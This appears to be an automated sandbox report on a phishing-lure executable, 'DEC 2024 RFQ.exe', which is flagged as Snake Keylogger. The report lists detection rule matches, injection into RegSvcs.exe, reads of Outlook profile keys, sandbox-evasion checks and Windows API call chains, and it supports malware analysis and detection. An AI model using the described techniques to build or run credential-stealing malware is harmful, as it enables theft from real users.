                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: DEC 2024 RFQ.exe PID: 7492, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@3/3
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008A06A GetLastError,FormatMessageW,0_2_0008A06A
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000781CB AdjustTokenPrivileges,CloseHandle,0_2_000781CB
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_000787E1
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0008B333
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0009EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0009EE0D
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0008C397
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00024E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00024E89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeFile created: C:\Users\user\AppData\Local\Temp\aut9F17.tmpJump to behavior
                  Source: DEC 2024 RFQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: DEC 2024 RFQ.exeReversingLabs: Detection: 39%
                  Source: unknownProcess created: C:\Users\user\Desktop\DEC 2024 RFQ.exe "C:\Users\user\Desktop\DEC 2024 RFQ.exe"
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\DEC 2024 RFQ.exe"
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\DEC 2024 RFQ.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: DEC 2024 RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: DEC 2024 RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: DEC 2024 RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: DEC 2024 RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: DEC 2024 RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: DEC 2024 RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: DEC 2024 RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: DEC 2024 RFQ.exe, 00000000.00000003.1681597343.0000000004290000.00000004.00001000.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1681428891.00000000040F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: DEC 2024 RFQ.exe, 00000000.00000003.1681597343.0000000004290000.00000004.00001000.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1681428891.00000000040F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: DEC 2024 RFQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: DEC 2024 RFQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: DEC 2024 RFQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: DEC 2024 RFQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: DEC 2024 RFQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00024B37 LoadLibraryA,GetProcAddress,0_2_00024B37
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008848F push FFFFFF8Bh; iretd 0_2_00088491
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0004E70F push edi; ret 0_2_0004E711
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0004E828 push esi; ret 0_2_0004E82A
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00048945 push ecx; ret 0_2_00048958
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0004EA03 push esi; ret 0_2_0004EA05
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0004EAEC push edi; ret 0_2_0004EAEE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E99C30 push esp; retf 0113h1_2_00E99D55
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E92398 push edi; iretd 1_2_00E923BE
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_000248D7
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000A5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_000A5376
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00043187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00043187
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeAPI/Special instruction interceptor: Address: 173C444
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: DEC 2024 RFQ.exe, 00000000.00000003.1666453279.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664147145.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664322405.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1666971979.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1665224245.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1666649288.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664422494.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664676808.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1665689565.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1666154606.0000000001750000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599435Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8240Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1584Jump to behavior
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-101811
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeAPI coverage: 4.8 %
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0008445A
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008C6D1 FindFirstFileW,FindClose,0_2_0008C6D1
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0008C75C
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0008EF95
